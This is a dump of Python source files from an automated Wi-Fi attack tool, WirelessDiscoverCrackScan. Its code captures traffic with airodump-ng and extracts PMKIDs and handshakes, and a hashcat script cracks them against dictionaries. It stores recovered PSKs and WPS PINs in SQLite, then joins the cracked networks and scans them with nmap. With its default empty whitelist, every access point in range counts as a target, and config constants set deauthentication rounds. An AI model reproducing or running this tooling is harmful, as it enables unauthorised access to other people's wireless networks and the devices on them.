index
int64 | repo_name
string | branch_name
string | path
string | content
string | import_graph
string |
|---|---|---|---|---|---|
34,400
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/discover.py
|
import csv
from wdcs.ap import *
from wdcs.crack import *
from wdcs.basicutils import Logger
class Discover(object):
def __init__(self, config, database, crack_utils, file_manager):
self.config = config
self.db = database
self.crack_utils = crack_utils
self.file_manager = file_manager
def select_accidentally_found_hs_and_pmkid(self, filepath, devices):
pmkid_messages = self.crack_utils.count_pmkid_messages(filepath)
msg = [set(), set(), set()] # [0] -> EAPOL Mesages 1, [1] -> EAPOL Messages 2, [2] -> EAPOL Messages 3
lines = self.crack_utils.read_tshark(filepath, "eapol")
Logger.log("Found {} accidental eapol messages".format(len(lines)))
for line in lines:
cols = line.split("\t")
if len(cols) == 8:
if "2 of 4" in cols[7]:
msg[1].add((Bssid.normalize_bssid(cols[4]), Bssid.normalize_bssid(cols[2])))
elif "1 of 4" in cols[7]:
msg[0].add((Bssid.normalize_bssid(cols[2]), Bssid.normalize_bssid(cols[4])))
elif "3 of 4" in cols[7]:
msg[2].add((Bssid.normalize_bssid(cols[2]), Bssid.normalize_bssid(cols[4])))
pmkid_candidates = [m[0] for m in msg[0] if m[0] in pmkid_messages]
Logger.log("PMKID messages: {}, msg: {}".format(pmkid_messages, msg))
done = []
for candidate in pmkid_candidates:
aps = [ap for ap in devices if ap.bssid == candidate]
if len(aps) > 0:
ap = aps[0]
if not ap.pmkid:
try:
self.crack_utils.convert_and_crack_pcap_pmkid(ap, filepath)
except CrackSuccess:
done.append(ap.bssid)
continue
else:
Logger.log("{} already have PMKID".format(ap.bssid))
for m in msg[1]:
if (m in msg[0] or m in msg[2]) and m[0] not in done:
candidate = m[1]
aps = [ap for ap in devices if ap.bssid == candidate]
if len(aps) > 0:
ap = aps[0]
if not ap.hs4:
try:
filtered_pcap = self.crack_utils.extract_ap_station_communication_from_pcap(filepath, Bssid.make_colon_bssid(m[0]), Bssid.make_colon_bssid(m[1]))
self.crack_utils.read_and_crack_handshake(ap, filtered_pcap, None)
except CrackSuccess:
pass
else:
Logger.log("{} already have 4hs".format(ap.bssid))
def __is_ap_collected(self, available, d):
return len([x for x in available["ap"] if x.bssid == d.bssid]) > 0
def __is_station_collected(self, available, d):
return len([x for x in available["station"] if x.mac == d.mac]) > 0
def discover_networks(self, available, sleep_seconds):
rounds = 0
update_counter = 0
sleep = 30
if sleep_seconds != -1:
round_limit = sleep_seconds / sleep
step = 1
else:
round_limit = 1
step = 0
Logger.log("Start scanning (sleep {} sec)...".format(sleep_seconds))
airodump = None
try:
airodump = AirodumpProcess(self.config.iface, self.file_manager)
airodump.wait_for_files()
while rounds < round_limit:
try:
Logger.log("...scanning...")
time.sleep(sleep)
except KeyboardInterrupt:
Logger.log("Interrupted by user")
rounds = round_limit
pt = Process.start_process_pipe_stdout(
["tshark", "-r", airodump.pcap_filepath, "-Y", "wps.wifi_protected_setup_state == 2",
"-T", "fields", "-e", "wlan.bssid"])
r = Bssid.normalize_bssid(pt.communicate()[0].decode("utf-8"))
wps_bssids = set(r.split("\n"))
Logger.log("WPS: " + str(wps_bssids))
with open(airodump.csv_filepath) as f:
f_csv = csv.reader(f, delimiter=",")
for line in f_csv:
if len(line) == 15:
if line[0] == "BSSID":
continue
d = Available_AP_Device(line, wps_bssids)
if update_counter == 0 or not self.__is_ap_collected(available, d):
new = self.db.update_ap_device(d)
if new:
d.new = True
if not self.__is_ap_collected(available, d):
available["ap"].append(d)
elif len(line) == 7:
if line[0] == "Station MAC":
continue
d = Available_Station_Device(line)
if update_counter == 0 or not self.__is_station_collected(available, d):
self.db.update_station_device(d)
if not self.__is_station_collected(available, d):
available["station"].append(d)
rounds += step
update_counter = (update_counter + 1) % self.config.SQL_DEVICE_UPDATE_THRESHOLD
except:
Logger.log("Cannot discover networks! {}".format(traceback.format_exc()))
finally:
if airodump:
airodump.kill()
return airodump.pcap_filepath
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,401
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/additional/hashcat_crack.py
|
# External cracking script, part of https://github.com/mmmds/WirelessDiscoverCrackScan
import datetime
import subprocess
import os
### CONFIGURATION
HASHCAT_DIR = "C:\\hashcat-5.1.0"
HASHCAT_EXE = "hashcat64.exe"
LOG_FILE = "crack_log.txt"
DICT_DIR = "./dicts"
def load_dict_list():
for r,d,f in os.walk(DICT_DIR):
return f
def parse_log():
r = {}
with open(LOG_FILE, "r") as f:
for line in f.readlines():
try:
a = line.split("/")
date = a[0]
dict_file = a[1].strip()
hash_file = a[2].split(".")[0].strip()
r[(hash_file, dict_file)] = date
except:
pass
return r
def append_log(file, dictionary):
text = "{}/{}/{}".format(str(datetime.datetime.now()), dictionary, file)
with open(LOG_FILE, "a") as f:
f.write("\n" + text)
def read_files():
result = ([],[])
files = os.listdir(".")
for f in files:
if f.endswith(".16800"):
result[0].append(f.split(".")[0])
elif f.endswith(".2500"):
result[1].append(f.split(".")[0])
return result
def process(files, t, logs, dicts):
for f in files:
for d in dicts:
if (f.split(".")[0], d) not in logs:
print("\n\n######## {} {}\n\n".format(f, d))
cwd = os.getcwd()
subprocess.Popen([HASHCAT_DIR+ "\\" + HASHCAT_EXE, "-m", t, "{}\\{}.{}".format(cwd,f, t), "{}\\{}\\{}".format(cwd,DICT_DIR, d)], cwd = HASHCAT_DIR).wait()
append_log(f, d)
else:
print("\n\n-----------{} {} in logs\n\n".format(f, d))
files = read_files()
logs = parse_log()
dicts = load_dict_list()
print(dicts)
print(files)
print(logs)
pmkid = files[0]
hs4 = files[1]
process(pmkid, "16800", logs, dicts)
process(hs4, "2500", logs, dicts)
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,402
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs.py
|
import sys
from wdcs.wdcs import WDCS
def print_usage():
bold = '\033[1m'
end_bold = '\033[0m'
print(bold + "Wireless Discover Crack Scan" +end_bold +" (v0.1)\n\tmass automated wifi security tool")
print("Usage:"
+ "\n\t{}{} auto{} - start auto scan".format(bold, script_name, end_bold)
+ "\n\t{}{} manual{} - start interactive scan".format(bold, script_name, end_bold)
+ "\n\t{}{} export OUTPUT_DIR{} - export nmap, psk, dictionary, pmkid and handshakes to files (for cracking)".format(bold, script_name, end_bold)
+ "\n\t{}{} psk ESSID PSK{} - add psk".format(bold, script_name, end_bold)
+ "\n\t{}{} show{} - show all collected info".format(bold, script_name, end_bold)
)
if __name__ == "__main__":
args = len(sys.argv)
script_name = sys.argv[0].split("/")[-1]
if args == 2 and sys.argv[1] == "auto":
WDCS().start(True)
elif args == 2 and sys.argv[1] == "manual":
WDCS().start(False)
elif args == 3 and sys.argv[1] == "export":
outdir = sys.argv[2]
WDCS().export(outdir)
elif args == 4 and sys.argv[1] == "psk":
essid = sys.argv[2]
psk = sys.argv[3]
WDCS().add_psk(essid, psk)
elif args == 2 and sys.argv[1] == "show":
WDCS().print_all()
else:
print_usage()
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,403
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/database.py
|
from wdcs.ap import *
import sqlite3
class Database(object):
def __init__(self, file_manager):
self.con = sqlite3.connect(file_manager.filepath("wifi.db"))
self.__sql_init()
def __sql_init(self):
try:
c = self.con.cursor()
c.execute(
"CREATE TABLE "
"ap_devices("
"bssid TEXT PRIMARY KEY,"
"first_seen TEXT,"
"last_seen TEXT,"
"last_attack TEXT,"
"power TEXT,"
"channel TEXT,"
"privacy TEXT,"
"cipher TEXT, "
"auth TEXT, "
"essid TEXT, "
"wps INT, "
"psk TEXT, "
"wps_pin TEXT, "
"pmkid TEXT, "
"wpa_handshake BLOB, "
"status TEXT "
")")
c.execute(
"CREATE TABLE station_devices("
"mac TEXT PRIMARY KEY, "
"first_seen TEXT, "
"last_seen TEXT, "
"bssid TEXT, "
"essid TEXT"
")")
c.execute(
"CREATE TABLE scan_results("
"bssid TEXT, "
"scan_date TEXT,"
"content BLOB"
")"
)
self.con.commit()
except:
pass
def update_station_device(self, device):
c = self.con.cursor()
c.execute("SELECT count(*) FROM station_devices WHERE mac = ?", (device.mac,))
exists = c.fetchone()[0] != 0
if exists:
Logger.log("Updating {}".format(device))
c.execute("UPDATE station_devices SET last_seen = ?, bssid = ?, essid = ? WHERE mac = ?",
(device.last, device.bssid, device.essid, device.mac))
self.con.commit()
else:
Logger.log("Adding {}".format(device))
c.execute("INSERT INTO station_devices (mac, first_seen, last_seen, bssid, essid) values (?, ?, ?, ?, ?)",
(device.mac, device.first, device.last, device.bssid, device.essid))
self.con.commit()
def update_ap_device(self, device):
c = self.con.cursor()
c.execute("SELECT count(*) FROM ap_devices WHERE bssid = ?", (device.bssid,))
exists = c.fetchone()[0] != 0
if exists:
Logger.log("Updating " + str(device))
c.execute("UPDATE ap_devices SET last_seen = ?, power = ?, channel = ?, wps = ? WHERE bssid = ?",
(device.last, device.power, device.channel, device.wps, device.bssid))
self.con.commit()
return False
else:
Logger.log("Adding " + str(device))
c.execute(
"INSERT INTO ap_devices "
"(bssid, power, first_seen, last_seen, channel, privacy, cipher, auth, essid, wps) "
"values (?,?,?,?,?,?,?,?,?,?)",
(device.bssid, device.power, device.first, device.last, device.channel, device.privacy, device.cipher,
device.auth, device.essid, device.wps))
self.con.commit()
return True
def update_ap_wps(self, ap, pin, psk):
c = self.con.cursor()
c.execute("UPDATE ap_devices SET wps_pin = ?, psk = ? WHERE bssid = ?", (pin, psk, ap.bssid))
self.con.commit()
def update_ap_pmkid(self, ap, pmkid):
c = self.con.cursor()
c.execute("UPDATE ap_devices SET pmkid = ? WHERE bssid = ?", (pmkid, ap.bssid))
self.con.commit()
def update_ap_wpa_handshake(self, ap, data):
c = self.con.cursor()
c.execute("UPDATE ap_devices SET wpa_handshake = ? WHERE bssid = ?", (data, ap.bssid))
self.con.commit()
def select_bssids_with_psk(self):
c = self.con.cursor()
c.execute("SELECT bssid FROM ap_devices WHERE psk IS NOT NULL")
rows = c.fetchall()
rows = [r[0] for r in rows]
return rows
def select_bssids_with_pmkid_or_4hs(self):
c = self.con.cursor()
c.execute("SELECT bssid FROM ap_devices WHERE pmkid IS NOT NULL OR wpa_handshake IS NOT NULL")
rows = c.fetchall()
rows = [r[0] for r in rows]
return rows
def select_psk_for_ap(self, ap):
c = self.con.cursor()
c.execute("SELECT psk FROM ap_devices WHERE bssid = ?", (ap.bssid,))
rows = c.fetchall()
if len(rows) > 0:
return rows[0][0]
else:
return None
def select_psk_for_essid(self, essid):
c = self.con.cursor()
c.execute("SELECT psk FROM ap_devices WHERE essid = ?", (essid,))
rows = c.fetchall()
return rows
def check_essid_exists(self, essid):
c = self.con.cursor()
c.execute("SELECT count(*) FROM ap_devices WHERE essid = ?", (essid,))
row = c.fetchone()
number = row[0]
if number == 0:
return False
elif number == 1:
return True
else:
Logger.log("There's more than one {}".format(essid))
return True
def get_display_devices(self, bssids = None):
c = self.con.cursor()
if bssids:
c.execute("SELECT bssid, essid, power, channel, privacy, first_seen, last_seen, "
"psk is not null, wpa_handshake is not null, pmkid is not null, wps, last_attack, status "
"FROM ap_devices WHERE bssid IN ({})".format(",".join("?"*len(bssids))), bssids)
else:
c.execute("SELECT bssid, essid, power, channel, privacy, first_seen, last_seen, "
"psk is not null, wpa_handshake is not null, pmkid is not null, wps, last_attack, status "
"FROM ap_devices")
rows = c.fetchall()
return [AP_Device(r) for r in rows]
def insert_scan_result(self, bssid, scan):
c = self.con.cursor()
c.execute("INSERT INTO scan_results (bssid, scan_date, content) VALUES (?,?,?)", (bssid, TimeUtils.now_str(), scan))
self.con.commit()
def update_last_attack(self, bssid, status = ""):
time = TimeUtils.now_str()
c = self.con.cursor()
c.execute("UPDATE ap_devices SET last_attack = ?, status = ? WHERE bssid = ?", (time, status, bssid))
self.con.commit()
def get_4hs_and_pmkid(self):
c = self.con.cursor()
c.execute("SELECT bssid, pmkid, wpa_handshake, essid FROM ap_devices WHERE psk IS NULL AND (pmkid IS NOT NULL OR wpa_handshake IS NOT NULL)")
rows = c.fetchall()
return rows
def update_psk_for_essid(self, essid, psk):
c = self.con.cursor()
c.execute("UPDATE ap_devices SET psk = ? WHERE essid = ?", (psk, essid))
self.con.commit()
def update_psk_for_bssid(self, bssid, psk):
c = self.con.cursor()
c.execute("UPDATE ap_devices SET psk = ? WHERE bssid = ?", (psk, bssid))
self.con.commit()
def select_all_psk(self):
c = self.con.cursor()
c.execute("SELECT bssid, essid, psk FROM ap_devices WHERE psk IS NOT NULL")
rows = c.fetchall()
return rows
def get_nmap_results(self):
c = self.con.cursor()
c.execute("SELECT bssid, content FROM scan_results")
rows = c.fetchall()
return rows
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,404
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/config.py
|
import configparser
from wdcs.basicutils import Bssid
from wdcs.logger import Logger
import os
class Config(object):
def __init__(self, file_manager):
self.define_const()
config_path = file_manager.filepath("cfg.ini")
parser = configparser.ConfigParser()
default = configparser.ConfigParser()
script_dir = os.path.dirname(__file__)
default["DEFAULT"] = {
"wlan_interface": "wlan0",
"wlan_client_interface": "wlan1",
"ap_whitelist": "",
"interactive": "true",
"scan_default_sleep_seconds": 600,
"auto_scan_device_threshold_minutes": 15,
"hashcat_dictionary": script_dir + "/dict.txt",
"skip_wps_bruteforce": "false",
"skip_wps_pixie": "false",
"skip_pmkid": "false",
"skip_4hs": "false",
"crack_in_auto_mode": "true"
}
if os.path.exists(config_path):
Logger.log("Reading config from file")
parser.read(config_path)
else:
Logger.log("Creating default config file")
with open(config_path, "w") as f:
default.write(f)
parser = default
self.interactive = self.__get_bool(parser,"interactive")
self.__ap_whitelist = []
self.scan_default_sleep_seconds = parser["DEFAULT"].getint("scan_default_sleep_seconds", default["DEFAULT"]["scan_default_sleep_seconds"])
self.iface = parser["DEFAULT"]["wlan_interface"]
self.iface_client = parser["DEFAULT"]["wlan_client_interface"]
self.hashcat_dictionary = parser["DEFAULT"]["hashcat_dictionary"]
self.skip_wps_bruteforce = self.__get_bool(parser,"skip_wps_bruteforce")
self.skip_wps_pixie = self.__get_bool(parser,"skip_wps_pixie")
self.skip_pmkid = self.__get_bool(parser,"skip_pmkid")
self.skip_4hs = self.__get_bool(parser,"skip_4hs")
self.auto_scan_device_threshold_minutes = parser["DEFAULT"].getint("auto_scan_device_threshold_minutes", default["DEFAULT"].getint("auto_scan_device_threshold_minutes"))
self.crack_in_auto_mode = self.__get_bool(parser, "crack_in_auto_mode")
for ap in parser["DEFAULT"].get("ap_whitelist", "").split(","):
bssid = Bssid.normalize_bssid(ap)
if Bssid.is_bssid(bssid):
self.__ap_whitelist.append(bssid)
def __get_bool(self, parser, key):
return parser["DEFAULT"].get(key, "").lower() in ["true", "yes", "1", "y"]
def define_const(self):
self.SQL_DEVICE_UPDATE_THRESHOLD = 10
self.TRIES_PER_STATION = 3
self.TRIES_LIMIT_NO_DEAUTH = 10
self.DEAUTH_COUNT_BASE = 5
self.SLEEP_AFTER_DEAUTH_BASE = 10
self.SLEEP_NO_DEAUTH = 15
def is_bssid_legal(self, bssid):
if len(self.__ap_whitelist) > 0:
return bssid in self.__ap_whitelist
return True
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,405
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/logger.py
|
import datetime
import logging
import os
import sys
class LoggerImpl(object):
def __init__(self):
filename = os.getenv("HOME") + "/.wdcs/log"
stdout_handler = logging.StreamHandler(sys.stdout)
file_handler = logging.FileHandler(filename)
logging.basicConfig(handlers=[stdout_handler, file_handler], format="[%(asctime)s] %(message)s", level=logging.DEBUG)
def log(self, text):
logging.info(text)
def print_nolog(self, text):
print(text)
Logger = LoggerImpl()
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,406
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/scan.py
|
from wdcs.crack import WpaSupplicant
from wdcs.logger import Logger
from wdcs.process import Process
from wdcs import timeutils
import time
class Nmap(object):
def __init__(self, config, db, file_manager):
self.config = config
self.db = db
self.file_manager = file_manager
def __start_nmap(self, ap, ip_cidr, udp, verbose=False):
nmap = None
try:
scan_type = "-sU" if udp else "-sS"
ports = "10" if udp else "100"
name_suffix = "UDP" if udp else "TCP"
if verbose:
scan_type += "VC"
name_suffix += "-V"
out_file = self.file_manager.filepath("nmap_{}_{}".format(ap.bssid, name_suffix))
cmd = ["nmap", "-oN", out_file, "-Pn", "-n", scan_type, "--top-ports", ports, "-e", self.config.iface]
if verbose:
cmd.append("-v")
cmd.append(ip_cidr)
nmap = Process.start_process_stdout(cmd)
count = 0
while True:
count += 1
time.sleep(30)
if nmap.poll() is not None:
Logger.log("nmap done")
break
if count >= 10:
Logger.log("nmap too long. stopping.")
break
with open(out_file) as f:
result = f.read()
self.db.insert_scan_result(ap.bssid, result)
finally:
if nmap and nmap.poll() is not None:
nmap.kill()
def scan(self, ap):
supplicant = None
dhclient = None
try:
if ap.enc == "OPN":
supplicant = WpaSupplicant.connect_open(ap, self.config, self.file_manager, wait=True)
else:
psk = self.db.select_psk_for_ap(ap)
supplicant = WpaSupplicant.connect_wpa(ap, psk, self.config, self.file_manager, wait=True)
dhclient = Process.start_process_pipe(["dhclient", "-r", self.config.iface])
dhclient.wait(10)
dhclient = Process.start_process_pipe(["dhclient", self.config.iface])
dhclient.wait(10)
ip = Process.start_process_pipe(["ip", "a", "show", self.config.iface])
out = ip.communicate()[0].decode("utf-8")
inet = [line for line in out.split("\n") if "inet " in line]
if len(inet) > 0:
Logger.log(inet[0])
ip_cidr = inet[0].split()[1]
self.__start_nmap(ap, ip_cidr, udp=False)
self.__start_nmap(ap, ip_cidr, udp=True)
self.__start_nmap(ap, ip_cidr, udp=False, verbose=True)
else:
Logger.log("No connection")
finally:
if supplicant:
supplicant.kill()
if dhclient:
dhclient.kill()
dhclient = Process.start_process_pipe(["dhclient", "-r", self.config.iface])
dhclient.wait(10)
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,407
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/process.py
|
from wdcs.logger import Logger
import subprocess
import os
from wdcs import timeutils
import time
class Process(object):
@classmethod
def start_process_pipe(cls, cmd):
return Process.start_process(cmd, subprocess.PIPE, subprocess.STDOUT)
@classmethod
def start_process_pipe_stdout(cls, cmd):
return Process.start_process(cmd, subprocess.PIPE, subprocess.DEVNULL)
@classmethod
def start_process_devnull(cls, cmd):
return Process.start_process(cmd, subprocess.DEVNULL, subprocess.DEVNULL)
@classmethod
def start_process_stdout(cls, cmd):
return Process.start_process(cmd, None, None)
@classmethod
def start_process_shell(cls, cmd):
return Process.start_process(cmd, None, None, True)
@classmethod
def start_process(cls, cmd, stdout, stderr, shell=False):
Logger.log("Executing cmd: {}".format(cmd))
return subprocess.Popen(cmd, stdout=stdout, stderr=stderr, shell=shell)
class AirodumpProcess(Process):
def __init__(self, interface, file_manager, ap=None):
self.file_manager = file_manager
self.__prepare_output_files()
cmd = ["airodump-ng", "--wps", "--output-format", "csv,pcap", "-w", self.file_manager.filepath("outa"), "--write-interval", "10"]
if ap:
cmd.append("--bssid")
cmd.append(ap.bssid)
cmd.append("-c")
cmd.append(ap.channel)
cmd.append(interface)
self.p = Process.start_process_devnull(cmd)
def __extract_last_file_number(self, ls_result, extension):
x = [self.safe_int(x.replace("outa-", "").replace(extension, "")) for x in ls_result if
x.startswith("outa-") and x.endswith(extension)]
x.sort(reverse=True)
if len(x) > 0:
return x[0]
return 0
def safe_int(self, val):
try:
return int(val)
except:
return 0
def __prepare_output_files(self):
pp = Process.start_process_pipe(["ls", self.file_manager.filepath(".")])
ls_out = pp.communicate()[0].decode("utf-8").split("\n")
csv_number = self.__extract_last_file_number(ls_out, ".csv")
cap_number = self.__extract_last_file_number(ls_out, ".cap")
if csv_number != cap_number:
Logger.log("Something wrong with output files. CSV: {}, CAP: {}".format(csv_number, cap_number))
new_number = csv_number + 1
self.csv_filepath = self.file_manager.filepath("outa-{:02}.csv".format(new_number))
self.pcap_filepath = self.file_manager.filepath("outa-{:02}.cap".format(new_number))
def wait_for_files(self):
Logger.log("Waiting for {} and {}".format(self.file_manager.filename(self.csv_filepath), self.file_manager.filename(self.pcap_filepath)))
wait_limit = 10
while not (os.path.exists(self.csv_filepath) and os.path.exists(self.pcap_filepath)):
wait_limit -= 1
if wait_limit == 0:
raise Exception("It's not gonna happen")
time.sleep(5)
Logger.log("Files exist")
def kill(self):
self.p.kill()
class WpaSupplicant(object):
@classmethod
def __write_config(cls, ap, r, file_manager):
conf_file = file_manager.filepath("wpa_supplicant_{}.conf".format(ap.bssid))
with open(conf_file, "w") as f:
f.write(r)
return conf_file
@classmethod
def __connect(cls, ap, config, file_manager, file_config_content, wait, second_iface):
conf_file = cls.__write_config(ap, file_config_content, file_manager)
iface = config.iface_client if second_iface else config.iface
out_file = file_manager.filepath("out_wpa_supplicant")
if os.path.isfile(out_file):
os.remove(out_file)
pw = Process.start_process_stdout(["wpa_supplicant", "-i", iface, "-c", conf_file, "-f", out_file])
if wait:
tries = 0
while tries < 5:
tries += 1
time.sleep(10)
with open(out_file) as f:
if len([c for c in f.readlines() if "CTRL-EVENT-CONNECTED" in c]) > 0:
return pw
raise Exception("Cannot connect using {}".format(conf_file))
else:
return pw
@classmethod
def connect_wpa(cls, ap, psk, config, file_manager, wait=False, second_iface=False):
p = Process.start_process_pipe(["wpa_passphrase", "{}".format(ap.essid), psk])
r = p.communicate()[0].decode("utf-8")
return cls.__connect(ap, config, file_manager, r, wait, second_iface)
@classmethod
def connect_open(cls, ap, config, file_manager, wait=False):
template = "network={{\n\tssid=\"{}\"\n\tkey_mgmt=NONE\n}}".format(ap.essid)
return cls.__connect(ap, config, file_manager, template, wait, False)
|
